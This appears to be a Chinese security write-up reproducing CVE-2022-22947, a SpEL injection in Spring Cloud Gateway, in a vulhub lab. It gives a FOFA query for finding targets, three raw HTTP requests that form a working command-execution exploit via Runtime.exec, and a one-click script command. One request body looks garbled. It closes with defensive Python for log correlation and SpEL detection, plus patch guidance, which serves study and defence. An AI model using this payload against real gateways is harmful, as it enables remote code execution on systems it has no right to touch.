0x01 Introduction
Spring Cloud Gateway is an API gateway built on Spring Framework and Spring Boot. It aims to give microservice architectures a simple, effective and unified way to manage API routing.
0x02 Vulnerability description
Spring Cloud Gateway is the API gateway of the Spring ecosystem. Versions up to and including 3.1.0 and 3.0.6 contain a SpEL expression injection vulnerability: when an attacker can reach the Actuator API, the flaw can be used to execute arbitrary commands.
0x03 Affected versions
3.1.0; 3.0.0 through 3.0.6; versions before 3.0.0
0x04 FOFA query
app="vmware-SpringBoot-framework"
0x05 Setting up the vulnerable environment
A Docker environment is used here:
https://github.com/vulhub/vulhub/blob/master/spring/CVE-2022-22947
Download the corresponding environment and build it quickly with docker-compose:
docker-compose up -d
Once it is up, visit http://IP:8080
0x06 Reproduction
The site looks like this (screenshot omitted):
1. Add a route containing a malicious expression
Sending the following request adds a route whose filter argument carries a malicious SpEL expression:
POST /actuator/gateway/routes/WeianSec HTTP/1.1
Host: 10.108.0.52:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Type: application/json
Content-Length: 329
{
"id": "WeianSec",
"filters": [{
"name": "AddResponseHeader",
"args": {
"name": "Result",
"value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
}
}],
"uri": "http://example.com"
}
2. Refresh the gateway routes
Then send the following request to apply the route just added. This request triggers evaluation of the SpEL expression:
POST /actuator/gateway/refresh HTTP/1.1
Host: 10.108.0.52:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Type: application/json
Content-Length: 523
Upgrade-Insecure-Requests=1&User-Agent=Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F98.0.4758.102+Safari%2F537.36&Accept=text%2Fhtml%2Capplication%2Fxhtml%2Bxml%2Capplication%2Fxml%3Bq%3D0.9%2Cimage%2Favif%2Cimage%2Fwebp%2Cimage%2Fapng%2C%2A%2F%2A%3Bq%3D0.8%2Capplication%2Fsigned-exchange%3Bv%3Db3%3Bq%3D0.9&Accept-Encoding=gzip%2C+deflate&Accept-Language=zh-CN%2Czh%3Bq%3D0.9&Connection=close&Content-Type=application%2Fx-www-form-urlencoded&Content-Length=0
3. Execute the command
Send the following request to view the execution result:
GET /actuator/gateway/routes/WeianSec HTTP/1.1
Host: 10.108.0.52:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36 Edg/98.0.1108.62
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
4. One-click script
python3 CVE-2022-22947.py -u http://10.108.0.52:8080 -x id
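The three-request sequence above (write a route under /actuator/gateway/routes/<id>, POST to /actuator/gateway/refresh, read the route back) is a distinctive pattern on the defending side. The following Python is an added example, not part of the original write-up or of Spring Cloud Gateway: it correlates that sequence per client IP over access-log lines, and separately walks a JSON route definition to flag any string value carrying the SpEL template marker "#{", which a route submitted through the actuator has no legitimate reason to contain. The log lines, the request body and the function names are constructed for this example.

```python
import json
import re
from collections import defaultdict

# Constructed access-log sample (not from the original post): one benign client,
# one client performing the add-route / refresh / read-route sequence.
SAMPLE_LOG = """\
10.0.0.7 - - [01/Mar/2022:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512
10.0.0.9 - - [01/Mar/2022:10:00:05 +0000] "POST /actuator/gateway/routes/WeianSec HTTP/1.1" 201 0
10.0.0.9 - - [01/Mar/2022:10:00:06 +0000] "POST /actuator/gateway/refresh HTTP/1.1" 200 0
10.0.0.9 - - [01/Mar/2022:10:00:07 +0000] "GET /actuator/gateway/routes/WeianSec HTTP/1.1" 200 640
10.0.0.12 - - [01/Mar/2022:10:01:00 +0000] "GET /actuator/health HTTP/1.1" 200 15
"""

# Common log format: ip ident user [timestamp] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
ROUTE_RE = re.compile(r'^/actuator/gateway/routes/(?P<route_id>[^/?]+)$')
REFRESH_PATH = '/actuator/gateway/refresh'


def parse_log(text):
    """Yield one dict per line that matches the common log format; skip the rest."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def find_gateway_abuse(text):
    """Correlate, per client IP, a POST to /actuator/gateway/routes/<id> followed
    by a POST to /actuator/gateway/refresh. Returns a list of (ip, route_id)."""
    pending = defaultdict(list)   # ip -> route ids written but not yet refreshed
    hits = []
    for ev in parse_log(text):
        if ev['method'] != 'POST':
            continue
        m = ROUTE_RE.match(ev['path'])
        if m:
            pending[ev['ip']].append(m.group('route_id'))
        elif ev['path'] == REFRESH_PATH:
            for route_id in pending.pop(ev['ip'], []):
                hits.append((ev['ip'], route_id))
    return hits


def spel_values(obj, path='$'):
    """Walk a decoded JSON route definition and return the JSON paths of every
    string value that contains the SpEL template marker '#{'."""
    found = []
    if isinstance(obj, dict):
        for k, v in obj.items():
            found.extend(spel_values(v, f'{path}.{k}'))
    elif isinstance(obj, list):
        for i, v in enumerate(obj):
            found.extend(spel_values(v, f'{path}[{i}]'))
    elif isinstance(obj, str) and '#{' in obj:
        found.append(path)
    return found


def check_route_body(body):
    """Return the SpEL-bearing paths in a JSON request body, or [] when there are
    none or the body is not valid JSON."""
    try:
        return spel_values(json.loads(body))
    except ValueError:          # json.JSONDecodeError is a ValueError subclass
        return []


# Constructed request body shaped like the one in the write-up, with the
# expression reduced to a harmless placeholder.
SUSPECT_BODY = json.dumps({
    "id": "demo",
    "filters": [{"name": "AddResponseHeader",
                 "args": {"name": "Result", "value": "#{1+1}"}}],
    "uri": "http://example.com",
})

if __name__ == '__main__':
    print(find_gateway_abuse(SAMPLE_LOG))   # [('10.0.0.9', 'WeianSec')]
    print(check_route_body(SUSPECT_BODY))   # ['$.filters[0].args.value']
```

Hook find_gateway_abuse into access-log review and check_route_body into whatever inspects request bodies in front of the gateway (a WAF or reverse proxy). Either signal should be rare on a healthy deployment, because the gateway actuator endpoint is an administrative interface: the vendor fix is to upgrade to 3.1.1 or 3.0.7, and until then to disable the endpoint with management.endpoint.gateway.enabled=false and keep /actuator off unauthenticated paths.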
0x07 References
https://github.com/vulhub/vulhub/blob/master/spring/CVE-2022-22947/README.zh-cn.md
https://mp.weixin.qq.com/s/5ZBpVTofGpG_ssz2iPeI2A